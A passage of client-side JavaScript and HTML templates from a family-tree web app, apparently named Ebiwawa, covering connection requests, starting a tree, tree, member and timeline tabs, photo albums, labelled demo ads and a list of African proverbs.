                                <p class="text-xs text-gray-500 mt-1">Spouse, sibling, and cousin are bidirectional. Aunt/uncle, grandparent, etc. automatically register the inverse on Person B's side. Multiple spouses supported.</p>
                            </div>

                            <div>
                                <label for="relationship-to-person" class="block text-sm font-medium text-gray-700 mb-1">Person B</label>
                                <select id="relationship-to-person" required class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    <option value="">Select person...</option>
                                </select>
                            </div>

                            <div id="marriage-year-row" class="hidden">
                                <label for="marriage-year" class="block text-sm font-medium text-gray-700 mb-1">Marriage year (optional)</label>
                                <input type="number" id="marriage-year" min="1800" max="2027" placeholder="e.g. 1998" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                <p class="text-xs text-gray-500 mt-1">Helps place this marriage on the family Timeline. Leave blank if unknown.</p>
                            </div>

                            <div class="flex justify-end pt-4 space-x-4">
                                <button type="button" onclick="closeModal('add-relationship-modal')" class="px-4 py-2 font-semibold text-gray-700 bg-gray-200 rounded-md hover:bg-gray-300">Cancel</button>
                                <button type="submit" class="btn btn-primary">Add Relationship</button>
                            </div>
                        </form>
                    </div>
                </div>
            `;
        }

        function WaitingForAcceptancePage(requests) {
            const formatDate = (ts) => {
                if (!ts) return '';
                try { return new Date(Number(ts)).toLocaleDateString(); } catch (e) { return ''; }
            };
            const requestCards = requests.map(r => `
                <div class="bg-white rounded-lg shadow p-5 mb-4">
                    <div class="flex items-start justify-between gap-4">
                        <div>
                            <h3 class="text-lg font-semibold text-gray-900">${r.treeName || '(unnamed tree)'}</h3>
                            <p class="text-sm text-gray-600 mt-1">Owned by ${r.ownerName || 'family member'}</p>
                            <p class="text-xs text-gray-500 mt-2">Request sent ${formatDate(r.requestedAt)}</p>
                        </div>
                        <span class="inline-flex items-center px-2.5 py-0.5 rounded-full text-xs font-medium bg-yellow-100 text-yellow-800">
                            ⏳ Pending
                        </span>
                    </div>
                </div>
            `).join('');

            // Empty array → "no family connections" state (post-block, or
            // first-time user who hasn't requested to join anyone yet).
            // Non-empty → original "waiting for acceptance" state.
            if (requests.length === 0) {
                return `<div id="family-tree-view" data-view class="max-w-2xl mx-auto">
                    <div class="text-center mb-8 mt-4">
                        <div class="text-5xl mb-3">🌱</div>
                        <h1 class="text-2xl font-semibold text-gray-900 mb-2">You're not in a family tree yet</h1>
                        <p class="text-gray-600">
                            You don't have any family connections right now. Either find someone on Ebiwawa to connect with, or start your own family tree.
                        </p>
                    </div>

                    <div class="p-5 border border-gray-200 rounded-lg bg-white mb-4">
                        <h2 class="text-base font-semibold text-gray-800 mb-2">Find someone on Ebiwawa</h2>
                        <p class="text-xs text-gray-500 mb-3">Search by name or email. Send them a connection request to be added to their family.</p>
                        <div class="flex gap-2">
                            <input type="text" id="orphan-search-input" placeholder="Name or email" class="flex-1 px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" onkeyup="if (event.key === 'Enter') searchFromOrphanPage()">
                            <button onclick="searchFromOrphanPage()" class="btn btn-primary text-sm whitespace-nowrap">Search</button>
                        </div>
                        <div id="orphan-search-results" class="mt-3"></div>
                    </div>

                    <div class="p-5 border border-gray-200 rounded-lg bg-gray-50 text-center">
                        <p class="text-sm text-gray-700 mb-3">
                            Or start your own family tree.
                        </p>
                        <button onclick="startOwnTreeFromWaiting()" class="btn btn-secondary">
                            Start my own tree
                        </button>
                    </div>
                </div>`;
            }
            return `<div id="family-tree-view" data-view class="max-w-2xl mx-auto">
                <div class="text-center mb-8 mt-4">
                    <div class="text-5xl mb-3">⏳</div>
                    <h1 class="text-2xl font-semibold text-gray-900 mb-2">Waiting for acceptance</h1>
                    <p class="text-gray-600">
                        ${requests.length === 1
                            ? `Your request to join the family below is pending. We'll let you know as soon as it's accepted.`
                            : `Your ${requests.length} requests to join families below are pending. We'll let you know as each is accepted.`}
                    </p>
                </div>

                ${requestCards}

                <div class="mt-8 p-5 border border-gray-200 rounded-lg bg-gray-50 text-center">
                    <p class="text-sm text-gray-700 mb-3">
                        Don't want to wait? You can start building your own family tree alongside any pending requests.
                    </p>
                    <button onclick="startOwnTreeFromWaiting()" class="btn btn-primary">
                        Start my own tree
                    </button>
                </div>
            </div>`;
        }

        // Inline search-and-invite affordance on the empty-state
        // WaitingForAcceptancePage. Lets the orphaned user find someone on
        // Ebiwawa (e.g. a family member from the tree they were just blocked
        // from) and send a fresh connection request — without needing access
        // to a tree first. /users/search and POST /connection-requests
        // already enforce the isDeleted + block checks added in B38.
        async function searchFromOrphanPage() {
            const inputEl = document.getElementById('orphan-search-input');
            const resultsEl = document.getElementById('orphan-search-results');
            if (!inputEl || !resultsEl) return;
            const q = (inputEl.value || '').trim();
            if (q.length < 2) {
                resultsEl.innerHTML = `<p class="text-xs text-gray-500">Enter at least 2 characters to search.</p>`;
                return;
            }
            resultsEl.innerHTML = `<p class="text-xs text-gray-500">Searching…</p>`;
            const esc = (s) => String(s || '').replace(/[&<>"']/g, c => ({
                '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
            }[c]));
            try {
                const response = await apiFetch(`${API_BASE_URL}/users/search?q=${encodeURIComponent(q)}`);
                const users = (response && response.users) || [];
                if (users.length === 0) {
                    resultsEl.innerHTML = `<p class="text-xs text-gray-500">No matches. Make sure they've signed up with the email you have.</p>`;
                    return;
                }
                resultsEl.innerHTML = users.map(u => {
                    const safeName = esc(u.name || u.email || 'Unknown');
                    const safeEmail = esc(u.email || '');
                    return `
                        <div class="flex items-center justify-between border border-gray-200 rounded-md p-2 mb-2">
                            <div class="min-w-0">
                                <div class="text-sm font-medium text-gray-900 truncate">${safeName}</div>
                                ${safeEmail ? `<div class="text-xs text-gray-500 truncate">${safeEmail}</div>` : ''}
                            </div>
                            <button onclick="sendOrphanConnectionRequest(${u.id}, '${safeName.replace(/'/g, "&#39;")}')" class="btn btn-primary text-xs whitespace-nowrap ml-3">Send request</button>
                        </div>
                    `;
                }).join('');
            } catch (err) {
                console.error('orphan search error', err);
                resultsEl.innerHTML = `<p class="text-xs text-error">Search failed. Try again in a moment.</p>`;
            }
        }

        async function sendOrphanConnectionRequest(userId, userName) {
            try {
                await apiFetch(`${API_BASE_URL}/connection-requests`, {
                    method: 'POST',
                    body: { toUserId: userId }
                });
                alert(`Connection request sent to ${escapeHtml(userName)}. They'll see it in their inbox.`);
                // Refresh /me so pendingTreeRequests updates and the waiting
                // screen flips from empty-state to actual waiting state.
                await fetchCurrentUser(true);
                renderApp();
            } catch (err) {
                console.error('orphan invite error', err);
                alert(err && err.message ? err.message : 'Could not send the request.');
            }
        }

        // Triggered from the WaitingForAcceptancePage when the user decides to
        // build their own tree alongside any pending join requests. The user
        // already filled in their personal info during /onboarding/skip-to-pending,
        // so we don't put them through the wizard again — we just ask for a
        // tree name and POST /onboarding/complete using the User-node data
        // already in Neo4j.
        async function startOwnTreeFromWaiting() {
            try {
                const me = await fetchCurrentUser(true);
                if (!me || !me.user) {
                    alert("Could not load your profile. Please refresh and try again.");
                    return;
                }
                const u = me.user;
                const lastName = u.lastName || '';
                const defaultTreeName = lastName ? `The ${lastName} Family` : 'My Family';

                const treeName = prompt(
                    `What would you like to call your family tree?`,
                    defaultTreeName
                );
                if (!treeName || !treeName.trim()) {
                    return; // user cancelled
                }

                const currentUser = auth.currentUser;
                const authToken = await currentUser.getIdToken();

                // Build the /onboarding/complete payload from the existing User node.
                const payload = {
                    userName: u.name || [u.firstName, u.middleName, u.lastName].filter(Boolean).join(' '),
                    userFirstName: u.firstName || '',
                    userMiddleName: u.middleName || '',
                    userLastName: u.lastName || '',
                    userBirthDate: u.birthDate || null,
                    userBirthYear: u.birthDate ? parseInt(u.birthDate.split('-')[0]) : null,
                    userBirthMonth: u.birthDate ? parseInt(u.birthDate.split('-')[1]) : null,
                    userBirthDay: u.birthDate ? parseInt(u.birthDate.split('-')[2]) : null,
                    userBirthPlace: u.birthPlace || '',
                    userCurrentLocation: u.currentLocation || '',
                    userGender: u.gender || '',
                    treeName: treeName.trim(),
                    motherFirstName: null,
                    motherLastName: null,
                    motherMaidenName: null,
                    fatherFirstName: null,
                    fatherLastName: null,
                };

                const response = await fetch(`${API_BASE_URL}/onboarding/complete`, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                        'Authorization': `Bearer ${authToken}`,
                    },
                    body: JSON.stringify(payload),
                });

                if (!response.ok) {
                    const err = await response.json().catch(() => ({}));
                    // Tree name collision: show alternatives and let the user pick or retype
                    if (response.status === 409 && Array.isArray(err.alternatives) && err.alternatives.length > 0) {
                        const message =
                            (err.message || 'That tree name is taken.') +
                            '\n\nPick one of these (type the number) or type a new name:\n' +
                            err.alternatives.map((a, i) => `  ${i + 1}. ${a}`).join('\n');
                        const choice = prompt(message, err.alternatives[0]);
                        if (!choice || !choice.trim()) return;
                        // If the user typed a digit, treat it as a selection
                        const idx = parseInt(choice.trim(), 10) - 1;
                        const newName = (Number.isInteger(idx) && idx >= 0 && idx < err.alternatives.length)
                            ? err.alternatives[idx]
                            : choice.trim();
                        payload.treeName = newName;
                        const retry = await fetch(`${API_BASE_URL}/onboarding/complete`, {
                            method: 'POST',
                            headers: {
                                'Content-Type': 'application/json',
                                'Authorization': `Bearer ${authToken}`,
                            },
                            body: JSON.stringify(payload),
                        });
                        if (!retry.ok) {
                            const err2 = await retry.json().catch(() => ({}));
                            throw new Error(err2.error || 'Failed to create your tree');
                        }
                    } else {
                        throw new Error(err.error || 'Failed to create your tree');
                    }
                }

                localStorage.setItem('bustUserCache', 'true');
                window.location.reload();
            } catch (e) {
                console.error('startOwnTreeFromWaiting error:', e);
                alert(e.message || 'Could not create your tree. Please try again.');
            }
        }

        function FamilyTreePage() {
            // Tabbed layout: header → tab strip → active view. Three tabs:
            // Family Tree (FTV, default), Members (Phase 1 list), Timeline.
            // Active tab persists per-tree in localStorage; on mount the
            // saved tab is applied via switchFamilyTreeTab() from renderApp.
            // Phase 2/2.5 FTV chrome and Phase 1 search/sort/filter live
            // inside their respective tab panels unchanged.
            const currentTreeId = appState.currentTreeId;
            // Initial paint uses 'family-tree' as a placeholder. The
            // real tab is applied by loadFamilyTreeData's post-fetch
            // resync (see call to switchFamilyTreeTab after
            // appState.currentTreeId is set). Doing the actual read
            // here would consume the nav-tap flag before the resync
            // runs; and on refresh currentTreeId is null so the read
            // would use the wrong 'unknown' storage key anyway. Trades
            // a brief default-tab flash for correctness.
            const initialTab = 'family-tree';
            const tabActive = (name) => name === initialTab;
            // Tab button: reduced padding + text-sm on mobile; each label
            // wrapped in a whitespace-nowrap span so "Members (N)" never
            // breaks mid-token. Strip itself scrolls horizontally on
            // narrow viewports as a last-resort fallback (see
            // .ebw-tab-strip-scroll below).
            const tabBtnClass = (name) => 'ebw-tab-btn px-3 md:px-6 py-3 text-sm md:text-base font-semibold transition-colors border-b-2 flex-shrink-0 '
                + (tabActive(name) ? 'border-primary text-primary' : 'border-transparent text-gray-500 hover:text-gray-700');
            const tabPanelClass = (name) => 'ebw-tab-panel' + (tabActive(name) ? '' : ' hidden');
            return `<div id="family-tree-view" data-view>
                        <!-- Tab strip. min-w-0 on the flex row lets it shrink under
                             the shell (per app-shell containment rule); overflow-x-auto
                             + flex-shrink-0 on buttons + whitespace-nowrap on labels
                             engages horizontal scroll only if labels won't fit even
                             with reduced padding. -->
                        <div class="flex gap-2 mb-6 border-b border-gray-200 min-w-0 overflow-x-auto">
                            <button
                                id="family-tree-tab-btn"
                                data-family-tree-tab="family-tree"
                                onclick="switchFamilyTreeTab('family-tree')"
                                class="${tabBtnClass('family-tree')} inline-flex items-center gap-2">
                                ${tablerIcon('users', { size: 16 })}
                                <span class="whitespace-nowrap">Family Tree</span>
                            </button>
                            <button
                                id="members-tab-btn"
                                data-family-tree-tab="members"
                                onclick="switchFamilyTreeTab('members')"
                                class="${tabBtnClass('members')} inline-flex items-center gap-2">
                                ${tablerIcon('user-circle', { size: 16 })}
                                <span class="whitespace-nowrap">Members (<span id="members-tab-count">0</span>)</span>
                            </button>
                            <button
                                id="timeline-tab-btn"
                                data-family-tree-tab="timeline"
                                onclick="switchFamilyTreeTab('timeline')"
                                class="${tabBtnClass('timeline')} inline-flex items-center gap-2">
                                ${tablerIcon('calendar', { size: 16 })}
                                <span class="whitespace-nowrap">Timeline</span>
                            </button>
                        </div>

                        <!-- Family Tree tab: FTV panel only. Phase 2 chrome
                             (multi-tree picker, zoom, perspective, focus) +
                             Phase 2.5 canvas (scroll arrows, edge fades,
                             empty state) preserved verbatim. -->
                        <div id="family-tree-tab-content" class="${tabPanelClass('family-tree')}">
                            <div class="ebw-panel relative" style="padding: 18px 24px;">
                                <div class="ebw-ftv-chrome">
                                    <div class="ebw-ftv-title-row">
                                        <div id="ebw-ftv-tree-picker" class="ebw-ftv-tree-picker"></div>
                                    </div>
                                    <div class="ebw-ftv-zoom-controls">
                                        <button class="ebw-ftv-icon-btn" onclick="zoomTreeIn()" aria-label="Zoom in" title="Zoom in">
                                            <svg width="14" height="14" fill="none" stroke="currentColor" viewBox="0 0 24 24"><path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0zM10 7v6m3-3H7"/></svg>
                                        </button>
                                        <button class="ebw-ftv-icon-btn" onclick="zoomTreeOut()" aria-label="Zoom out" title="Zoom out">
                                            <svg width="14" height="14" fill="none" stroke="currentColor" viewBox="0 0 24 24"><path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0zM13 10H7"/></svg>
                                        </button>
                                        <button class="ebw-ftv-icon-btn" onclick="resetTreeZoom()" aria-label="Fit to view" title="Fit to view">
                                            <svg width="14" height="14" fill="none" stroke="currentColor" viewBox="0 0 24 24"><path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 8V4m0 0h4M4 4l5 5m11-1V4m0 0h-4m4 0l-5 5M4 16v4m0 0h4m-4 0l5-5m11 5l-5-5m5 5v-4m0 4h-4"/></svg>
                                        </button>
                                    </div>
                                    <div id="ebw-ftv-perspective" class="ebw-ftv-perspective" style="display: none;">
                                        <button class="ebw-ftv-toggle-btn active" data-perspective="viewer" onclick="setFtvPerspective('viewer')">My perspective</button>
                                        <button class="ebw-ftv-toggle-btn" data-perspective="creator" onclick="setFtvPerspective('creator')">Tree creator's view</button>
                                        <span id="ebw-ftv-perspective-info"></span>
                                    </div>
                                    <div id="ebw-ftv-focus" class="ebw-ftv-focus">
                                        <button class="ebw-ftv-toggle-btn active" data-focus="focused" onclick="setFtvFocusMode('focused')">Focused</button>
                                        <button class="ebw-ftv-toggle-btn" data-focus="full" onclick="setFtvFocusMode('full')">Full tree</button>
                                        <span id="ebw-ftv-focus-info"></span>
                                    </div>
                                </div>
                                <div class="overflow-hidden rounded ebw-ftv-canvas relative">
                                    <button id="ebw-ftv-scroll-left" class="ebw-ftv-scroll-arrow ebw-ftv-scroll-left" aria-label="Scroll left" tabindex="-1">‹</button>
                                    <button id="ebw-ftv-scroll-right" class="ebw-ftv-scroll-arrow ebw-ftv-scroll-right" aria-label="Scroll right" tabindex="-1">›</button>
                                    <div id="ebw-ftv-fade-left" class="ebw-ftv-fade ebw-ftv-fade-left"></div>
                                    <div id="ebw-ftv-fade-right" class="ebw-ftv-fade ebw-ftv-fade-right"></div>
                                    <div id="ebw-ftv-scroll-clip" class="ebw-ftv-scroll-clip">
                                        <svg id="tree-display" width="1000" height="600"></svg>
                                    </div>
                                    <div id="ebw-ftv-empty-state" class="ebw-ftv-empty-state" style="display: none;">
                                        <h3 class="ebw-ftv-empty-heading">Your family awaits</h3>
                                        <p class="ebw-ftv-empty-body">Add your first connection to see your family grow.</p>
                                        <button class="ebw-btn ebw-btn-primary" onclick="openAddRelationshipModal({fromPersonId: appState._ftvViewerPersonId})">+ Add a relationship</button>
                                        <a href="#" class="ebw-ftv-empty-link" onclick="event.preventDefault(); setFtvFocusMode('full');">Or switch to Full tree to see everyone in this family</a>
                                    </div>
                                </div>
                                <div id="ebw-ftv-focus-hint" class="ebw-ftv-focus-hint" style="display: none;"></div>
                            </div>
                        </div>

                        <!-- Members tab: Phase 1 list only. Panel-header title
                             tracks the tree name; count in the tab label is
                             updated by renderPeopleList after each render. -->
                        <div id="members-tab-content" class="${tabPanelClass('members')}">
                            <div id="people-list" class="ebw-panel">
                                <div class="ebw-panel-header">
                                    <h3 class="ebw-panel-title" id="people-panel-title">${escapeHtml(appState.currentTree?.name || 'My Family Tree')}</h3>
                                    <div class="ebw-action-triad">
                                        <button class="ebw-btn ebw-btn-primary" onclick="openModal('invite-family-modal')">Invite</button>
                                        <button class="ebw-btn ebw-btn-outline" onclick="openAddPersonModal()">+ Person</button>
                                        <button class="ebw-btn ebw-btn-ghost" onclick="openAddRelationshipModal()">+ Relationship</button>
                                    </div>
                                </div>
                                <!-- Session 2c Task 1 v5: Family & Connections was absorbed
                                     into the Tree tab per v2 IA. Surface it as a small link
                                     row here — the pending requests / sent invites / blocked
                                     users management belongs in the Members context. Tap
                                     navigates to family-connections-view; Tree tab stays
                                     active (via _updateNativeTabActive mapping). -->
                                <div class="px-4 py-2 text-sm border-b border-gray-100 bg-gray-50 flex items-center justify-between">
                                    <span class="text-gray-600">Pending requests, sent invites, blocked users</span>
                                    <a href="#" onclick="navigateToView('members-view'); return false;" class="text-primary font-medium hover:underline">Manage →</a>
                                </div>

                                <div class="ebw-toolbar">
                                    <input id="people-search" type="text" class="ebw-search" placeholder="Search by name" oninput="rerenderPeopleList()">
                                    <select id="people-sort" class="ebw-select" onchange="rerenderPeopleList()">
                                        <option value="generation">Sort: Generation</option>
                                        <option value="name">Sort: Name</option>
                                        <option value="recent">Sort: Recently added</option>
                                    </select>
                                    <select id="people-filter" class="ebw-select" onchange="rerenderPeopleList()">
                                        <option value="all">All people</option>
                                        <option value="connected">Connected to me</option>
                                        <option value="living">Living only</option>
                                    </select>
                                </div>

                                <div id="people-cards" class="ebw-grid">
                                    <p class="ebw-empty-state">Loading...</p>
                                </div>

                                <div id="people-footer-count" class="ebw-footer-count"></div>
                            </div>
                        </div>

                        <!-- Timeline tab -->
                        <div id="timeline-tab-content" class="${tabPanelClass('timeline')}">
                            ${TimelineViewContent()}
                        </div>
                    </div>`;
        }

        function TimelineViewContent() {
            return `
                <div id="timeline-container" class="max-w-4xl mx-auto">
                    <div class="mb-6 flex flex-col sm:flex-row sm:items-center sm:justify-between gap-3">
                        <div class="min-w-0">
                            <p class="text-gray-600">Explore your family's journey through time</p>
                        </div>
                        <div class="flex flex-col sm:flex-row sm:items-center gap-2 min-w-0">
                            <label for="timeline-person-filter" class="text-sm text-gray-600 whitespace-nowrap">Filter by person:</label>
                            <select id="timeline-person-filter" onchange="filterTimelineByPerson()" class="w-full sm:w-auto min-w-0 px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                <option value="">All People</option>
                            </select>
                        </div>
                    </div>

                    <!-- Timeline Loading State -->
                    <!-- Loading state: skeleton row + spinner so the wait
                         feels responsive instead of a blank page. Timeline
                         is a heavy graph aggregation on the backend; even
                         with 60s cache, first-visit fetches take a moment
                         on larger trees. -->
                    <div id="timeline-loading" class="py-8 space-y-4">
                        <div class="flex items-center justify-center gap-2 text-gray-500 text-sm">
                            <svg class="animate-spin w-4 h-4" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" aria-hidden="true">
                                <circle cx="12" cy="12" r="10" stroke="currentColor" stroke-width="2" stroke-opacity="0.25"/>
                                <path d="M22 12a10 10 0 0 0-10-10" stroke="currentColor" stroke-width="2" stroke-linecap="round"/>
                            </svg>
                            <span>Loading timeline…</span>
                        </div>
                        <div class="space-y-3">
                            <div class="h-16 bg-gray-100 rounded animate-pulse"></div>
                            <div class="h-16 bg-gray-100 rounded animate-pulse"></div>
                            <div class="h-16 bg-gray-100 rounded animate-pulse"></div>
                        </div>
                    </div>

                    <!-- Timeline Content -->
                    <div id="timeline-events" class="hidden relative">
                        <!-- Vertical line -->
                        <div class="absolute left-8 top-0 bottom-0 w-0.5 bg-gray-300"></div>

                        <!-- Timeline events will be inserted here -->
                    </div>

                    <!-- Empty State -->
                    <div id="timeline-empty" class="hidden text-center py-12">
                        <p class="text-gray-500 text-lg mb-2">No timeline events yet</p>
                        <p class="text-gray-400 text-sm">Add family members, events, and posts to build your family timeline</p>
                    </div>
                </div>
            `;
        }
        function PhotoAlbumsPage() {
            return `
                <div id="photo-albums-view" data-view>
                    ${nativeFeedSegmentedControl('photos')}
                    <div class="flex items-center justify-between mb-6">
                        <h2 class="text-2xl font-semibold">Photos</h2>
                        <button onclick="openModal('create-album-modal')" class="btn btn-primary">
                            + Create Album
                        </button>
                    </div>
                    <div id="album-list" class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-6">
                        <p class="text-gray-500 col-span-full">Loading albums...</p>
                    </div>
                    <!-- Prompt 15: "Shared with you" section rendered by
                         fetchAndRenderSharedAlbums after own-album render
                         completes. Header + grid stay hidden when the
                         response is empty. -->
                    <section id="shared-albums-section" class="mt-10 hidden">
                        <div class="flex items-center gap-2 mb-4">
                            <h3 class="text-xl font-semibold">Shared with you</h3>
                            <span id="shared-albums-count" class="text-sm text-gray-500"></span>
                        </div>
                        <div id="shared-album-list" class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-6"></div>
                    </section>
                </div>
            `;
        }
        function AlbumDetailPage(albumId, albumTitle, albumDescription, albumIsDefault, sharedRole) {
            // data-album-* triple lives on #album-detail-view itself so any
            // descendant control (header pencil, upload button, future
            // actions) can walk up via .closest() and read the current
            // album context. Same pattern as the album card wrappers.
            // isDefault gates the pencil per F21 (default album can't be
            // renamed; backend rejects the PATCH anyway but hiding the
            // button is the honest UX).
            //
            // Prompt 15: sharedRole ∈ {undefined, 'viewer', 'contributor'}
            // controls the shared-recipient chrome. undefined = owner
            // (all controls). 'viewer' = read-only (no upload, no pencil,
            // no share). 'contributor' = upload only (no pencil, no share).
            // Backend guards enforce these too — this is presentation.
            // data-shared-role is stashed so fetchAndRenderPhotos + the
            // lightbox can read it back for per-photo control gating.
            const isViewer = sharedRole === 'viewer';
            const isContributor = sharedRole === 'contributor';
            const isSharedRecipient = isViewer || isContributor;
            const canUpload = !isViewer;      // owner + contributor
            const canRename = !isSharedRecipient && !albumIsDefault;
            const canShare = !isSharedRecipient && !albumIsDefault;
            return `
                <div id="album-detail-view" data-view
                     data-album-id="${albumId}"
                     data-album-title="${escapeHtml(albumTitle || '')}"
                     data-album-description="${escapeHtml(albumDescription || '')}"
                     data-album-is-default="${albumIsDefault ? 'true' : 'false'}"
                     data-shared-role="${escapeHtml(sharedRole || '')}">
                    <div class="flex items-center justify-between mb-6">
                        <button onclick="navigateToView('photo-albums-view')" class="text-primary hover:underline">&larr; Back to Albums</button>
                        <div>
                            ${canUpload ? `
                                <input type="file" id="album-upload-input" class="hidden" accept="image/*" multiple data-album-id="${albumId}">
                                <button onclick="ebwOpenPhotoPicker('album-upload-input')" class="px-4 py-2 text-sm font-semibold text-white rounded-md bg-primary hover:bg-opacity-90">Upload to this Album</button>
                            ` : ''}
                        </div>
                    </div>
                    <div class="flex items-center gap-2 mb-2">
                        <h2 class="text-2xl font-semibold">${escapeHtml(albumTitle || '')}</h2>
                        ${canRename ? `
                            <button type="button" onclick="openRenameAlbumFromEl(this, event)" aria-label="Rename album" title="Rename album"
                                    class="ebw-album-rename-btn p-2 rounded-md text-gray-500 hover:text-primary hover:bg-gray-100 transition-colors">
                                ${tablerIcon('pencil', { size: 18, preserveColor: true })}
                            </button>
                        ` : ''}
                        ${canShare ? `
                            <button type="button" onclick="openShareAlbumFromEl(this, event)" aria-label="Share album" title="Share album"
                                    class="ebw-album-share-btn p-2 rounded-md text-gray-500 hover:text-primary hover:bg-gray-100 transition-colors">
                                ${tablerIcon('share', { size: 18, preserveColor: true })}
                            </button>
                        ` : ''}
                        ${isSharedRecipient ? `
                            <span class="ml-1 inline-flex items-center gap-1 text-xs px-2 py-0.5 rounded-full ${isContributor ? 'bg-blue-100 text-blue-800' : 'bg-gray-100 text-gray-700'}">
                                ${tablerIcon('share', { size: 12, preserveColor: true })}
                                ${isContributor ? 'Shared (contributor)' : 'Shared (viewer)'}
                            </span>
                        ` : ''}
                    </div>
                    <div id="photo-grid" class="mt-6 grid grid-cols-2 md:grid-cols-3 lg:grid-cols-4 gap-4">
                        <p class="text-text-secondary col-span-full">Loading photos...</p>
                    </div>
                </div>
            `;
        }

        // --- AD RENDERING FUNCTIONS ---
        //
        // One-slot rule (ad-banner-brief.md revised):
        //   - Ebiwawa Family (User 0 on prod, the editorial account)
        //     keeps the dedicated ad banner slot at the top of the feed;
        //     rotates through 4 fictional demo ads with a "Sponsored"
        //     label — investor demo of the future revenue stream. CTAs
        //     inert (return false).
        //   - Everyone else: NO dedicated banner. H1 (Invite) and H2
        //     (Photo Analysis) are folded into the cultural doodle
        //     rotation via renderAfricanCultureCard() so the headline
        //     slot renders EITHER a cultural card OR a house ad per
        //     render — never both stacked. Prevents two promo-shaped
        //     cards before the first family post on the mobile fold.
        //
        // Rotation: Date.now() % N per render. Chosen over a module
        // counter because module state resets on every page load — a
        // hard-refresh (the natural "give me a different ad" gesture)
        // would otherwise always pick index 0. Millisecond timestamp
        // gives effectively-random per-render selection, matches the
        // brief's `Date.now() % 4` example. No timers, no animation,
        // no tracking, no backend calls.
        const _EBW_DEMO_ADS = [
            // D1 leads the rotation per brief.
            { brand: 'Rekindle Photo Studio', headline: 'Bring the 1970s album back to life', line: 'Professional scanning and restoration for faded family photos. From £15.', cta: 'Restore a photo' },
            { brand: 'SwiftHome Transfers',   headline: 'Send money home in seconds',        line: 'Fast transfers to Nigeria, Ghana, Kenya and 40+ countries. First transfer free.', cta: 'Get started' },
            { brand: 'Adinkra Travel',        headline: 'December in Lagos?',                line: 'Early-bird fares from London to West Africa. Book the homecoming now.', cta: 'See fares' },
            { brand: 'Kente & Co Events',     headline: 'Planning a celebration of life?',   line: 'Caterers, halls and aso-ebi tailors for family occasions across the UK.', cta: 'Find vendors' },
        ];
        // House-ad copy lives inside renderAfricanCultureCard() now —
        // no separate _EBW_HOUSE_ADS array. See the houseInvite/housePhoto
        // branches in that function.

        // Session 2f: native-only segmented control at the top of the Feed tab.
        // 2c Task 1 IA decided Photos absorbs into the Feed tab (5-slot tabbar
        // has no Photos slot). Documented intent was "Photos accessible from
        // Feed's header pill" but the pill was never built — Photos became
        // unreachable on native. This restores reachability as a Posts|Photos
        // toggle rendered inside BOTH FeedPage() and PhotoAlbumsPage() so the
        // toggle is visible whichever segment you're on. CSS-gated to
        // body.ebw-native — web is untouched (sidebar + drawer + web mobile
        // nav still carry their own Photos entries).
        //
        // Segments route via existing navigateToView which handles scroll
        // preservation per-viewId for free (2c per-view scroll infra) — each
        // segment IS its own viewId so per-segment scroll comes along.
        // activeSegment ∈ {'posts', 'photos'}.
        function nativeFeedSegmentedControl(activeSegment) {
            const isActive = (seg) => seg === activeSegment;
            return `
                <div class="ebw-feed-segmented mb-4">
                    <button type="button"
                            class="ebw-feed-segment ${isActive('posts') ? 'active' : ''}"
                            aria-pressed="${isActive('posts')}"
                            onclick="ebwFeedSegment('posts')">
                        Posts
                    </button>
                    <button type="button"
                            class="ebw-feed-segment ${isActive('photos') ? 'active' : ''}"
                            aria-pressed="${isActive('photos')}"
                            onclick="ebwFeedSegment('photos')">
                        Photos
                    </button>
                </div>
            `;
        }
        function ebwFeedSegment(seg) {
            if (typeof window.nativeHapticTap === 'function') window.nativeHapticTap();
            const targetViewId = seg === 'photos' ? 'photo-albums-view' : 'feed-view';
            if (appState.currentView === targetViewId) return;
            navigateToView(targetViewId);
        }

        function renderBannerAd(position = 'top') {
            // Ebiwawa Family editorial account is Neo4j User 0 on prod.
            // Reuses appState.currentUserNeo4jId — the same signal every
            // other owner-check uses. No new flag or backend field.
            // For everyone else this slot renders NOTHING; house ads
            // appear inside the cultural doodle rotation instead.
            if (appState.currentUserNeo4jId !== 0) return '';
            const ad = _EBW_DEMO_ADS[Date.now() % _EBW_DEMO_ADS.length];
            return `
                <div class="ebw-panel ebw-ad-panel mb-6" role="complementary" aria-label="Sponsored ad">
                    <div class="ebw-ad-header">
                        <span class="ebw-ad-brand">${escapeHtml(ad.brand)}</span>
                        <span class="ebw-ad-sponsored">Sponsored</span>
                    </div>
                    <h3 class="ebw-ad-headline">${escapeHtml(ad.headline)}</h3>
                    <p class="ebw-ad-line">${escapeHtml(ad.line)}</p>
                    <button type="button" class="ebw-btn ebw-btn-primary" onclick="return false;">${escapeHtml(ad.cta)}</button>
                </div>
            `;
        }

        // African Cultural Content Data
        const africanCulturalContent = {
            proverbs: [
                { text: "If you want to go fast, go alone. If you want to go far, go together.", origin: "African Proverb" },
                { text: "A tree cannot stand without roots.", origin: "African Proverb" },
                { text: "However long the night, the dawn will break.", origin: "African Proverb" },
                { text: "Smooth seas do not make skillful sailors.", origin: "African Proverb" },
                { text: "The child who is not embraced by the village will burn it down to feel its warmth.", origin: "African Proverb" },
                { text: "When there is no enemy within, the enemies outside cannot hurt you.", origin: "African Proverb" },
                { text: "A family is like a forest: when you are outside it is dense, when you are inside you see that each tree has its place.", origin: "African Proverb" },
                { text: "Unity is strength, division is weakness.", origin: "Swahili Proverb" },
                { text: "He who learns, teaches.", origin: "Ethiopian Proverb" },
                { text: "A single bracelet does not jingle.", origin: "Congolese Proverb" },
                { text: "The one who plants trees, knowing that they will never sit in their shade, has at least started to understand the meaning of life.", origin: "African Proverb" },
